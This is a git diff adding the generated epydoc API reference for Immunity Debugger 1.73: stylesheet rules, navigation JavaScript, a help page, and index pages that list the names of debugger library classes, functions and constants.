+ * - In the 'variable details' sections, each varaible's value is
+ * listed in a 'pre.variable' box. The width of this box is
+ * restricted to 80 chars; if the value's repr is longer than
+ * this it will be wrapped, using a backslash marked with
+ * class 'variable-linewrap'. If the value's repr is longer
+ * than 3 lines, the rest will be ellided; and an ellipsis
+ * marker ('...' marked with 'variable-ellipsis') will be used.
+ * - If the value is a string, its quote marks will be marked
+ * with 'variable-quote'.
+ * - If the variable is a regexp, it is syntax-highlighted using
+ * the re* CSS classes.
+ */
+pre.variable { padding: .5em; margin: 0;
+ background: #dce4ec; color: #000000;
+ border: 1px solid #708890; }
+.variable-linewrap { color: #604000; font-weight: bold; }
+.variable-ellipsis { color: #604000; font-weight: bold; }
+.variable-quote { color: #604000; font-weight: bold; }
+.variable-group { color: #008000; font-weight: bold; }
+.variable-op { color: #604000; font-weight: bold; }
+.variable-string { color: #006030; }
+.variable-unknown { color: #a00000; font-weight: bold; }
+.re { color: #000000; }
+.re-char { color: #006030; }
+.re-op { color: #600000; }
+.re-group { color: #003060; }
+.re-ref { color: #404040; }
+
+/* Base tree
+ * - Used by class pages to display the base class hierarchy.
+ */
+pre.base-tree { font-size: 80%; margin: 0; }
+
+/* Frames-based table of contents headers
+ * - Consists of two frames: one for selecting modules; and
+ * the other listing the contents of the selected module.
+ * - h1.toc is used for each frame's heading
+ * - h2.toc is used for subheadings within each frame.
+ */
+h1.toc { text-align: center; font-size: 105%;
+ margin: 0; font-weight: bold;
+ padding: 0; }
+h2.toc { font-size: 100%; font-weight: bold;
+ margin: 0.5em 0 0 -0.3em; }
+
+/* Syntax Highlighting for Source Code
+ * - doctest examples are displayed in a 'pre.py-doctest' block.
+ * If the example is in a details table entry, then it will use
+ * the colors specified by the 'table pre.py-doctest' line.
+ * - Source code listings are displayed in a 'pre.py-src' block.
+ * Each line is marked with 'span.py-line' (used to draw a line
+ * down the left margin, separating the code from the line
+ * numbers). Line numbers are displayed with 'span.py-lineno'.
+ * The expand/collapse block toggle button is displayed with
+ * 'a.py-toggle' (Note: the CSS style for 'a.py-toggle' should not
+ * modify the font size of the text.)
+ * - If a source code page is opened with an anchor, then the
+ * corresponding code block will be highlighted. The code
+ * block's header is highlighted with 'py-highlight-hdr'; and
+ * the code block's body is highlighted with 'py-highlight'.
+ * - The remaining py-* classes are used to perform syntax
+ * highlighting (py-string for string literals, py-name for names,
+ * etc.)
+ */
+pre.py-doctest { padding: .5em; margin: 1em;
+ background: #e8f0f8; color: #000000;
+ border: 1px solid #708890; }
+table pre.py-doctest { background: #dce4ec;
+ color: #000000; }
+pre.py-src { border: 2px solid #000000;
+ background: #f0f0f0; color: #000000; }
+.py-line { border-left: 2px solid #000000;
+ margin-left: .2em; padding-left: .4em; }
+.py-lineno { font-style: italic; font-size: 90%;
+ padding-left: .5em; }
+a.py-toggle { text-decoration: none; }
+div.py-highlight-hdr { border-top: 2px solid #000000;
+ border-bottom: 2px solid #000000;
+ background: #d8e8e8; }
+div.py-highlight { border-bottom: 2px solid #000000;
+ background: #d0e0e0; }
+.py-prompt { color: #005050; font-weight: bold;}
+.py-more { color: #005050; font-weight: bold;}
+.py-string { color: #006030; }
+.py-comment { color: #003060; }
+.py-keyword { color: #600000; }
+.py-output { color: #404040; }
+.py-name { color: #000050; }
+.py-name:link { color: #000050 !important; }
+.py-name:visited { color: #000050 !important; }
+.py-number { color: #005000; }
+.py-defname { color: #000060; font-weight: bold; }
+.py-def-name { color: #000060; font-weight: bold; }
+.py-base-class { color: #000060; }
+.py-param { color: #000060; }
+.py-docstring { color: #006030; }
+.py-decorator { color: #804020; }
+/* Use this if you don't want links to names underlined: */
+/*a.py-name { text-decoration: none; }*/
+
+/* Graphs & Diagrams
+ * - These CSS styles are used for graphs & diagrams generated using
+ * Graphviz dot. 'img.graph-without-title' is used for bare
+ * diagrams (to remove the border created by making the image
+ * clickable).
+ */
+img.graph-without-title { border: none; }
+img.graph-with-title { border: 1px solid #000000; }
+span.graph-title { font-weight: bold; }
+span.graph-caption { }
+
+/* General-purpose classes
+ * - 'p.indent-wrapped-lines' defines a paragraph whose first line
+ * is not indented, but whose subsequent lines are.
+ * - The 'nomargin-top' class is used to remove the top margin (e.g.
+ * from lists). The 'nomargin' class is used to remove both the
+ * top and bottom margin (but not the left or right margin --
+ * for lists, that would cause the bullets to disappear.)
+ */
+p.indent-wrapped-lines { padding: 0 0 0 7em; text-indent: -7em;
+ margin: 0; }
+.nomargin-top { margin-top: 0; }
+.nomargin { margin-top: 0; margin-bottom: 0; }
+
+/* HTML Log */
+div.log-block { padding: 0; margin: .5em 0 .5em 0;
+ background: #e8f0f8; color: #000000;
+ border: 1px solid #000000; }
+div.log-error { padding: .1em .3em .1em .3em; margin: 4px;
+ background: #ffb0b0; color: #000000;
+ border: 1px solid #000000; }
+div.log-warning { padding: .1em .3em .1em .3em; margin: 4px;
+ background: #ffffb0; color: #000000;
+ border: 1px solid #000000; }
+div.log-info { padding: .1em .3em .1em .3em; margin: 4px;
+ background: #b0ffb0; color: #000000;
+ border: 1px solid #000000; }
+h2.log-hdr { background: #70b0ff; color: #000000;
+ margin: 0; padding: 0em 0.5em 0em 0.5em;
+ border-bottom: 1px solid #000000; font-size: 110%; }
+p.log { font-weight: bold; margin: .5em 0 .5em 0; }
+tr.opt-changed { color: #000000; font-weight: bold; }
+tr.opt-default { color: #606060; }
+pre.log { margin: 0; padding: 0; padding-left: 1em; }
diff --git a/1.73/Documentation/Ref/epydoc.js b/1.73/Documentation/Ref/epydoc.js
new file mode 100755
index 0000000..95875d6
--- /dev/null
+++ b/1.73/Documentation/Ref/epydoc.js
@@ -0,0 +1,293 @@
+function toggle_private() {
+ // Search for any private/public links on this page. Store
+ // their old text in "cmd," so we will know what action to
+ // take; and change their text to the opposite action.
+ var cmd = "?";
+ var elts = document.getElementsByTagName("a");
+ for(var i=0; i... 0)
+ if (elt.id.substring(split, elt.id.length) == "-expanded")
+ if (num_lines(elt.innerHTML) > min_lines)
+ collapse(elt.id.substring(0, split));
+ }
+}
+
+function expandto(href) {
+ var start = href.indexOf("#")+1;
+ if (start != 0 && start != href.length) {
+ if (href.substring(start, href.length) != "-") {
+ collapse_all(4);
+ pos = href.indexOf(".", start);
+ while (pos != -1) {
+ var id = href.substring(start, pos);
+ expand(id);
+ pos = href.indexOf(".", pos+1);
+ }
+ var id = href.substring(start, href.length);
+ expand(id);
+ highlight(id);
+ }
+ }
+}
+
+function kill_doclink(id) {
+ var parent = document.getElementById(id);
+ parent.removeChild(parent.childNodes.item(0));
+}
+function auto_kill_doclink(ev) {
+ if (!ev) var ev = window.event;
+ if (!this.contains(ev.toElement)) {
+ var parent = document.getElementById(this.parentID);
+ parent.removeChild(parent.childNodes.item(0));
+ }
+}
+
+function doclink(id, name, targets_id) {
+ var elt = document.getElementById(id);
+
+ // If we already opened the box, then destroy it.
+ // (This case should never occur, but leave it in just in case.)
+ if (elt.childNodes.length > 1) {
+ elt.removeChild(elt.childNodes.item(0));
+ }
+ else {
+ // The outer box: relative + inline positioning.
+ var box1 = document.createElement("div");
+ box1.style.position = "relative";
+ box1.style.display = "inline";
+ box1.style.top = 0;
+ box1.style.left = 0;
+
+ // A shadow for fun
+ var shadow = document.createElement("div");
+ shadow.style.position = "absolute";
+ shadow.style.left = "-1.3em";
+ shadow.style.top = "-1.3em";
+ shadow.style.background = "#404040";
+
+ // The inner box: absolute positioning.
+ var box2 = document.createElement("div");
+ box2.style.position = "relative";
+ box2.style.border = "1px solid #a0a0a0";
+ box2.style.left = "-.2em";
+ box2.style.top = "-.2em";
+ box2.style.background = "white";
+ box2.style.padding = ".3em .4em .3em .4em";
+ box2.style.fontStyle = "normal";
+ box2.onmouseout=auto_kill_doclink;
+ box2.parentID = id;
+
+ // Get the targets
+ var targets_elt = document.getElementById(targets_id);
+ var targets = targets_elt.getAttribute("targets");
+ var links = "";
+ target_list = targets.split(",");
+ for (var i=0; i" +
+ target[0] + "";
+ }
+
+ // Put it all together.
+ elt.insertBefore(box1, elt.childNodes.item(0));
+ //box1.appendChild(box2);
+ box1.appendChild(shadow);
+ shadow.appendChild(box2);
+ box2.innerHTML =
+ "Which "+name+" do you want to see documentation for?" +
+ "";
+ }
+ return false;
+}
+
+function get_anchor() {
+ var href = location.href;
+ var start = href.indexOf("#")+1;
+ if ((start != 0) && (start != href.length))
+ return href.substring(start, href.length);
+ }
+function redirect_url(dottedName) {
+ // Scan through each element of the "pages" list, and check
+ // if "name" matches with any of them.
+ for (var i=0; i-m" or "-c";
+ // extract the portion & compare it to dottedName.
+ var pagename = pages[i].substring(0, pages[i].length-2);
+ if (pagename == dottedName.substring(0,pagename.length)) {
+
+ // We've found a page that matches `dottedName`;
+ // construct its URL, using leftover `dottedName`
+ // content to form an anchor.
+ var pagetype = pages[i].charAt(pages[i].length-1);
+ var url = pagename + ((pagetype=="m")?"-module.html":
+ "-class.html");
+ if (dottedName.length > pagename.length)
+ url += "#" + dottedName.substring(pagename.length+1,
+ dottedName.length);
+ return url;
+ }
+ }
+ }
diff --git a/1.73/Documentation/Ref/frames.html b/1.73/Documentation/Ref/frames.html
new file mode 100755
index 0000000..3fe85be
--- /dev/null
+++ b/1.73/Documentation/Ref/frames.html
@@ -0,0 +1,17 @@
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/help.html b/1.73/Documentation/Ref/help.html
new file mode 100755
index 0000000..f1e796a
--- /dev/null
+++ b/1.73/Documentation/Ref/help.html
@@ -0,0 +1,272 @@
+
+
+
+
+ Help
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+ API Documentation
+
+ This document contains the API (Application Programming Interface)
+documentation for Immunity Debugger API Reference. Documentation for the Python
+objects defined by the project is divided into separate pages for each
+package, module, and class. The API documentation also includes two
+pages containing information about the project as a whole: a trees
+page, and an index page.
+
+ Object Documentation
+
+ Each Package Documentation page contains:
+
+ A description of the package.
+ A list of the modules and sub-packages contained by the
+ package.
+ A summary of the classes defined by the package.
+ A summary of the functions defined by the package.
+ A summary of the variables defined by the package.
+ A detailed description of each function defined by the
+ package.
+ A detailed description of each variable defined by the
+ package.
+
+
+ Each Module Documentation page contains:
+
+ A description of the module.
+ A summary of the classes defined by the module.
+ A summary of the functions defined by the module.
+ A summary of the variables defined by the module.
+ A detailed description of each function defined by the
+ module.
+ A detailed description of each variable defined by the
+ module.
+
+
+ Each Class Documentation page contains:
+
+ A class inheritance diagram.
+ A list of known subclasses.
+ A description of the class.
+ A summary of the methods defined by the class.
+ A summary of the instance variables defined by the class.
+ A summary of the class (static) variables defined by the
+ class.
+ A detailed description of each method defined by the
+ class.
+ A detailed description of each instance variable defined by the
+ class.
+ A detailed description of each class (static) variable defined
+ by the class.
+
+
+ Project Documentation
+
+ The Trees page contains the module and class hierarchies:
+
+ The module hierarchy lists every package and module, with
+ modules grouped into packages. At the top level, and within each
+ package, modules and sub-packages are listed alphabetically.
+ The class hierarchy lists every class, grouped by base
+ class. If a class has more than one base class, then it will be
+ listed under each base class. At the top level, and under each base
+ class, classes are listed alphabetically.
+
+
+ The Index page contains indices of terms and
+ identifiers:
+
+ The term index lists every term indexed by any object's
+ documentation. For each term, the index provides links to each
+ place where the term is indexed.
+ The identifier index lists the (short) name of every package,
+ module, class, method, function, variable, and parameter. For each
+ identifier, the index provides a short description, and a link to
+ its documentation.
+
+
+ The Table of Contents
+
+ The table of contents occupies the two frames on the left side of
+the window. The upper-left frame displays the project
+contents , and the lower-left frame displays the module
+contents :
+
+
+
+
+ Project
+
+ API
+
+
+
+ Module
+
+
The project contents frame contains a list of all packages
+and modules that are defined by the project. Clicking on an entry
+will display its contents in the module contents frame. Clicking on a
+special entry, labeled "Everything," will display the contents of
+the entire project.
+
+ The module contents frame contains a list of every
+submodule, class, type, exception, function, and variable defined by a
+module or package. Clicking on an entry will display its
+documentation in the API documentation frame. Clicking on the name of
+the module, at the top of the frame, will display the documentation
+for the module itself.
+
+ The "frames " and "no frames " buttons below the top
+navigation bar can be used to control whether the table of contents is
+displayed or not.
+
+ The Navigation Bar
+
+ A navigation bar is located at the top and bottom of every page.
+It indicates what type of page you are currently viewing, and allows
+you to go to related pages. The following table describes the labels
+on the navigation bar. Note that not some labels (such as
+[Parent]) are not displayed on all pages.
+
+
+
+ Label
+ Highlighted when...
+ Links to...
+
+ [Parent] (never highlighted) the parent of the current package [Package] viewing a package
+ the package containing the current object
+ [Module] viewing a module
+ the module containing the current object
+ [Class] viewing a class
+ the class containing the current object [Trees] viewing the trees page
+ the trees page [Index] viewing the index page
+ the index page [Help] viewing the help page
+ the help page
+
+ The "show private " and "hide private " buttons below
+the top navigation bar can be used to control whether documentation
+for private objects is displayed. Private objects are usually defined
+as objects whose (short) names begin with a single underscore, but do
+not end with an underscore. For example, "_x",
+"__pprint", and "epydoc.epytext._tokenize"
+are private objects; but "re.sub",
+"__init__", and "type_" are not. However,
+if a module defines the "__all__" variable, then its
+contents are used to decide which objects are private.
+
+ A timestamp below the bottom navigation bar indicates when each
+page was last updated.
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/identifier-index.html b/1.73/Documentation/Ref/identifier-index.html
new file mode 100755
index 0000000..c550a22
--- /dev/null
+++ b/1.73/Documentation/Ref/identifier-index.html
@@ -0,0 +1,3788 @@
+
+
+
+
+ Identifier Index
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+Identifier Index
+
+[
+ A
+ B
+ C
+ D
+ E
+ F
+ G
+ H
+ I
+ J
+ K
+ L
+ M
+ N
+ O
+ P
+ Q
+ R
+ S
+ T
+ U
+ V
+ W
+ X
+ Y
+ Z
+ _
+]
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/index.html b/1.73/Documentation/Ref/index.html
new file mode 100755
index 0000000..7dba356
--- /dev/null
+++ b/1.73/Documentation/Ref/index.html
@@ -0,0 +1,17 @@
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/module-tree.html b/1.73/Documentation/Ref/module-tree.html
new file mode 100755
index 0000000..2390603
--- /dev/null
+++ b/1.73/Documentation/Ref/module-tree.html
@@ -0,0 +1,121 @@
+
+
+
+
+ Module Hierarchy
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+ [ Module Hierarchy
+ | Class Hierarchy ]
+ Module Hierarchy
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/toc-Libs.debugtypes-module.html b/1.73/Documentation/Ref/toc-Libs.debugtypes-module.html
new file mode 100755
index 0000000..8e6d632
--- /dev/null
+++ b/1.73/Documentation/Ref/toc-Libs.debugtypes-module.html
@@ -0,0 +1,39 @@
+
+
+
+
+ debugtypes
+ Module debugtypes
+Classes
+ Handle MemoryPage Module PEB Stack Symbol Table Variables
+ MemoryProtection [hide private ]
+
+
+
+
diff --git a/1.73/Documentation/Ref/toc-Libs.graphclass-module.html b/1.73/Documentation/Ref/toc-Libs.graphclass-module.html
new file mode 100755
index 0000000..7c17c74
--- /dev/null
+++ b/1.73/Documentation/Ref/toc-Libs.graphclass-module.html
@@ -0,0 +1,37 @@
+
+
+
+
+ graphclass
+ Module graphclass
+Classes
+ Draw Graph Line Vertex vcgNode Variables
+ ImmDrawColors [hide private ]
+
+
+
+
diff --git a/1.73/Documentation/Ref/toc-Libs.immlib-module.html b/1.73/Documentation/Ref/toc-Libs.immlib-module.html
new file mode 100755
index 0000000..14befbe
--- /dev/null
+++ b/1.73/Documentation/Ref/toc-Libs.immlib-module.html
@@ -0,0 +1,169 @@
+
+
+
+
+ immlib
+ Module immlib
+Classes
+ Debugger DictTypes Variables
+ BpFlags BpKeys BpMemFlags COUNT C_BAD C_CAL C_CMD C_FLG C_FLT C_JMC C_JMP C_MMX C_NOW C_POP C_PRI C_PSH C_REP C_RET C_RTF C_SSE C_TYPEMASK DECR_3DNOW DECR_BYTE DECR_DWORD DECR_FLOAT10 DECR_ISREG DECR_QWORD DECR_SEG DECR_SSE DECR_TYPEMASK DECR_WORD DEC_3DNOW DEC_BYTE DEC_BYTESW DEC_CALLDEST DEC_CHECKED DEC_COMMAND DEC_CONST DEC_DWORD DEC_FLOAT10 DEC_FLOAT4 DEC_FLOAT8 DEC_FWORD DEC_JMPDEST DEC_NEXTCODE DEC_NEXTDATA DEC_PBODY DEC_PEND DEC_PROC DEC_PROCMASK DEC_QWORD DEC_SIGNED DEC_SSE DEC_STRING DEC_TBYTE DEC_TEXT DEC_TYPEMASK DEC_UNICODE DEC_UNKNOWN DEC_WORD DISASM_ALL DISASM_CODE DISASM_DATA DISASM_FILE DISASM_RTRACE DISASM_SIZE DISASM_TRACE DebugerStatus EXCEPTION_CODE FS_HOOK FS_PAUSE FS_UNHOOK HB_ACCESS HB_CODE HB_FREE HB_IO HB_ONESHOT HB_STOPAN HB_TEMP HB_WRITE HOOK_REG HookTypes IgnoreSingleStep ImmDrawColors ImmFonts MemoryProtection NM_ANALYSE NM_ANYNAME NM_ARG NM_ASM NM_ASSUME NM_BREAK NM_BREAKEXPL NM_BREAKEXPR NM_CASE NM_COMMENT NM_CONST NM_DEBUG NM_DLLPARMS NM_EXPORT NM_FINDASM NM_FONT NM_GOTO NM_GOTODUMP NM_GOTOSTACK NM_HILITE NM_IMCALL NM_IMPLIB NM_IMPNAME NM_IMPORT NM_INSPECT NM_LABEL NM_LASTWATCH NM_LIBCOMM NM_LIBRARY NM_MODSEARCH NM_NONAME NM_PLUGCMD NM_REFTXT NM_SCHEME NM_SOURCE NM_STRUCT NM_TRPAUSE NM_WATCH PageFlags RST_INDIRECT RST_INVALID RST_VALUE RST_VFIXUP Register RegisterName Registers16BitsOrder Registers32BitsOrder Registers8BitsOrder __VERSION__ jmpTypeFlags [hide private ]
+
+
+
+
diff --git a/1.73/Documentation/Ref/toc-Libs.immutils-module.html b/1.73/Documentation/Ref/toc-Libs.immutils-module.html
new file mode 100755
index 0000000..5863591
--- /dev/null
+++ b/1.73/Documentation/Ref/toc-Libs.immutils-module.html
@@ -0,0 +1,140 @@
+
+
+
+
+ immutils
+ Module immutils
+Classes
+ antifloatdict Functions
+ IsInt __MOSDEFimport__ b big2int big_order big_short binary_from_string binary_string_bits binary_string_char binary_string_int binary_string_int16 binary_string_int32 binary_string_int64 binary_string_int8 binary_string_short bits byteswap_16 byteswap_32 byteswap_64 byteswap_bits c_array check_bits_consistancy check_string_len dInt decimal2binary deprecate devlog dummywrite fmt_bits halfword2bstr halfword2istr hasbadchar hexdump hexprint int2list32 int2list_bits int2str16 int2str16_swapped int2str32 int2str32_swapped int2str_bits int2uns intel_order intel_short intel_str2int isdebug istr2halfword istr2int nstr2halfword prettyhexprint prettyprint print_binary shellcode_dump short2bigstr signedshort sint16 sint16fmt sint32 sint32fmt sint64 sint64fmt sint_bits sint_is_signed sintfmt_bits split_int32 split_int_bits str2bigendian str2int16 str2int16_swapped str2int32 str2int32_swapped str2int64 str2int64_swapped str2int_bits str2int_bits_swapped str2littleendian uint16 uint16fmt uint32 uint32fmt uint64 uint64fmt uint8 uint8fmt uint_bits uintfmt_bits uniqlist warning_restore warnings_safely_ignore warnmsg Variables
+
+
+ __VERSION__ goodchars [hide private ]
+
+
+
+
diff --git a/1.73/Documentation/Ref/toc-Libs.immvcglib-module.html b/1.73/Documentation/Ref/toc-Libs.immvcglib-module.html
new file mode 100755
index 0000000..64d5500
--- /dev/null
+++ b/1.73/Documentation/Ref/toc-Libs.immvcglib-module.html
@@ -0,0 +1,61 @@
+
+
+
+
+ immvcglib
+ Module immvcglib
+Classes
+ ParseVCGList graphTree Functions
+ addEndPointToEdge adjustStartCoords applyDummyPathsH2North applyDummyPathsH2North2 applyDummyPathsH2South applyDummyPathsH2SouthTrue checkForPlacedVertex checkForPlacedVertex2 checkPlanarity createAdjacencyList createVertexList defineVertexRelation drawEdges drawVertices finalAttemptToPlace firstAttemptToPlace generateGraph generateGraphFromBuf generateVCG pathFinder saveVCG searchForDummyPathsH2North searchForDummyPathsH2South searchForDummyPathsW testVCGParse Variables
+ PALETTE __VERSION__ [hide private ]
+
+
+
+
diff --git a/1.73/Documentation/Ref/toc-Libs.internals-module.html b/1.73/Documentation/Ref/toc-Libs.internals-module.html
new file mode 100755
index 0000000..db1f8f6
--- /dev/null
+++ b/1.73/Documentation/Ref/toc-Libs.internals-module.html
@@ -0,0 +1,35 @@
+
+
+
+
+ internals
+ Module internals
+Functions
+ addGenHook hookmain hookmaintimeout Variables
+ __VERSION__ [hide private ]
+
+
+
+
diff --git a/1.73/Documentation/Ref/toc-Libs.libanalize-module.html b/1.73/Documentation/Ref/toc-Libs.libanalize-module.html
new file mode 100755
index 0000000..badbce7
--- /dev/null
+++ b/1.73/Documentation/Ref/toc-Libs.libanalize-module.html
@@ -0,0 +1,111 @@
+
+
+
+
+ libanalize
+ Module libanalize
+Classes
+ BasicBlock Decode Function JMCBasicBlock JMPBasicBlock RETBasicBlock TraceArgs XREFBasicBlock opCode Variables
+ COUNT C_BAD C_CAL C_CMD C_FLG C_FLT C_JMC C_JMP C_MMX C_NOW C_POP C_PRI C_PSH C_REP C_RET C_RTF C_SSE C_TYPEMASK DECR_3DNOW DECR_BYTE DECR_DWORD DECR_FLOAT10 DECR_ISREG DECR_QWORD DECR_SEG DECR_SSE DECR_TYPEMASK DECR_WORD DEC_3DNOW DEC_BYTE DEC_BYTESW DEC_CALLDEST DEC_CHECKED DEC_COMMAND DEC_CONST DEC_DWORD DEC_FLOAT10 DEC_FLOAT4 DEC_FLOAT8 DEC_FWORD DEC_JMPDEST DEC_NEXTCODE DEC_NEXTDATA DEC_PBODY DEC_PEND DEC_PROC DEC_PROCMASK DEC_QWORD DEC_SIGNED DEC_SSE DEC_STRING DEC_TBYTE DEC_TEXT DEC_TYPEMASK DEC_UNICODE DEC_UNKNOWN DEC_WORD DISASM_ALL DISASM_CODE DISASM_DATA DISASM_FILE DISASM_RTRACE DISASM_SIZE DISASM_TRACE RST_INDIRECT RST_INVALID RST_VALUE RST_VFIXUP RegisterName __VERSION__ [hide private ]
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/toc-Libs.libcontrolflow-module.html b/1.73/Documentation/Ref/toc-Libs.libcontrolflow-module.html
new file mode 100755
index 0000000..3e2a436
--- /dev/null
+++ b/1.73/Documentation/Ref/toc-Libs.libcontrolflow-module.html
@@ -0,0 +1,35 @@
+
+
+
+
+ libcontrolflow
+ Module libcontrolflow
+Classes
+ ControlFlowAnalysis DominatorTree Variables
+ __VERSION__ [hide private ]
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/toc-Libs.libdatatype-module.html b/1.73/Documentation/Ref/toc-Libs.libdatatype-module.html
new file mode 100755
index 0000000..7edc46e
--- /dev/null
+++ b/1.73/Documentation/Ref/toc-Libs.libdatatype-module.html
@@ -0,0 +1,54 @@
+
+
+
+
+ libdatatype
+ Module libdatatype
+Classes
+ Data DataTypes DoubleLinkedList Pointer String Unicode Variables
+ DATA_PTR DIACRITICAL DOUBLEL DWORD FUNCTION_PTR INT MEM MEM_ADDR PLAINASCII POINTER PTR RAREASCII STACK_PTR STRING UNICODE __VERSION__ ctable [hide private ]
+
+
+
+
diff --git a/1.73/Documentation/Ref/toc-Libs.libevent-module.html b/1.73/Documentation/Ref/toc-Libs.libevent-module.html
new file mode 100755
index 0000000..0da096f
--- /dev/null
+++ b/1.73/Documentation/Ref/toc-Libs.libevent-module.html
@@ -0,0 +1,44 @@
+
+
+
+
+ libevent
+ Module libevent
+Classes
+ CreateProcessEvent CreateThreadEvent Event ExceptionEvent ExceptionRecord ExitProcessEvent ExitThreadEvent LoadDLLEvent OutputDebugEvent RIPEvent UnloadDLLEvent Variables
+ EXCEPTION_CODE __VERSION__ [hide private ]
+
+
+
+
diff --git a/1.73/Documentation/Ref/toc-Libs.libheap-module.html b/1.73/Documentation/Ref/toc-Libs.libheap-module.html
new file mode 100755
index 0000000..9720a44
--- /dev/null
+++ b/1.73/Documentation/Ref/toc-Libs.libheap-module.html
@@ -0,0 +1,51 @@
+
+
+
+
+ libheap
+ Module libheap
+Classes
+ Blocks Bucket LFHeap LocalData LocalSegmentInfo PHeap PHeapLookaside PLook SearchHeap Segment SubSegment UserData UserMemoryCache VistaPHeap win32heapchunk win32vistaheapchunk Variables
+ CHUNK_ANALIZE HEAP_MAX_FREELIST SHOWCHUNK_FULL __VERSION__ [hide private ]
+
+
+
+
diff --git a/1.73/Documentation/Ref/toc-Libs.libhook-module.html b/1.73/Documentation/Ref/toc-Libs.libhook-module.html
new file mode 100755
index 0000000..4a7779e
--- /dev/null
+++ b/1.73/Documentation/Ref/toc-Libs.libhook-module.html
@@ -0,0 +1,53 @@
+
+
+
+
+ libhook
+ Module libhook
+Classes
+ AccessViolationHook AllExceptHook BpHook CreateProcessHook CreateThreadHook ExitProcessHook ExitThreadHook FastLogHook Hook LoadDLLHook LogBpHook PostAnalysisHook PreBpHook RunUntilAV STDCALLFastLogHook UnloadDLLHook Variables
+ FS_HOOK FS_PAUSE FS_UNHOOK HOOK_REG HookTypes __VERSION__ [hide private ]
+
+
+
+
diff --git a/1.73/Documentation/Ref/toc-Libs.librecognition-module.html b/1.73/Documentation/Ref/toc-Libs.librecognition-module.html
new file mode 100755
index 0000000..fbfcbe7
--- /dev/null
+++ b/1.73/Documentation/Ref/toc-Libs.librecognition-module.html
@@ -0,0 +1,122 @@
+
+
+
+
+ librecognition
+ Module librecognition
+Classes
+ FunctionRecognition MultiCSVIterator Variables
+ COUNT C_BAD C_CAL C_CMD C_FLG C_FLT C_JMC C_JMP C_MMX C_NOW C_POP C_PRI C_PSH C_REP C_RET C_RTF C_SSE C_TYPEMASK DATA_PTR DECR_3DNOW DECR_BYTE DECR_DWORD DECR_FLOAT10 DECR_ISREG DECR_QWORD DECR_SEG DECR_SSE DECR_TYPEMASK DECR_WORD DEC_3DNOW DEC_BYTE DEC_BYTESW DEC_CALLDEST DEC_CHECKED DEC_COMMAND DEC_CONST DEC_DWORD DEC_FLOAT10 DEC_FLOAT4 DEC_FLOAT8 DEC_FWORD DEC_JMPDEST DEC_NEXTCODE DEC_NEXTDATA DEC_PBODY DEC_PEND DEC_PROC DEC_PROCMASK DEC_QWORD DEC_SIGNED DEC_SSE DEC_STRING DEC_TBYTE DEC_TEXT DEC_TYPEMASK DEC_UNICODE DEC_UNKNOWN DEC_WORD DIACRITICAL DISASM_ALL DISASM_CODE DISASM_DATA DISASM_FILE DISASM_RTRACE DISASM_SIZE DISASM_TRACE DOUBLEL DWORD FUNCTION_PTR INT MEM MEM_ADDR PLAINASCII POINTER PTR RAREASCII RST_INDIRECT RST_INVALID RST_VALUE RST_VFIXUP RegisterName Registers16BitsOrder Registers32BitsOrder Registers8BitsOrder STACK_PTR STRING UNICODE __VERSION__ ctable [hide private ]
+
+
+
+
diff --git a/1.73/Documentation/Ref/toc-Libs.libregisters-module.html b/1.73/Documentation/Ref/toc-Libs.libregisters-module.html
new file mode 100755
index 0000000..1b063e6
--- /dev/null
+++ b/1.73/Documentation/Ref/toc-Libs.libregisters-module.html
@@ -0,0 +1,37 @@
+
+
+
+
+ libregisters
+ Module libregisters
+Classes
+ GFlags Variables
+ GFlagsRef GFlagsTags __version__ g [hide private ]
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/toc-Libs.pelib-module.html b/1.73/Documentation/Ref/toc-Libs.pelib-module.html
new file mode 100755
index 0000000..e312b0d
--- /dev/null
+++ b/1.73/Documentation/Ref/toc-Libs.pelib-module.html
@@ -0,0 +1,52 @@
+
+
+
+
+ pelib
+ Module pelib
+Classes
+ Directory IMGOPThdr IMGhdr ImageExportDirectory ImageImportByName ImportDescriptor MZ PE PEError PElib Section Functions
+ hexdump readStringFromFile usage Variables
+ IMAGE_NUMBEROF_DIRECTORY_ENTRIES IMAGE_ORDINAL_FLAG IMAGE_SIZEOF_FILE_HEADER MZ_MAGIC PE_MAGIC __VERSION__ [hide private ]
+
+
+
+
diff --git a/1.73/Documentation/Ref/toc-everything.html b/1.73/Documentation/Ref/toc-everything.html
new file mode 100755
index 0000000..a72e830
--- /dev/null
+++ b/1.73/Documentation/Ref/toc-everything.html
@@ -0,0 +1,590 @@
+
+
+
+
+ Everything
+ Everything
+All Classes
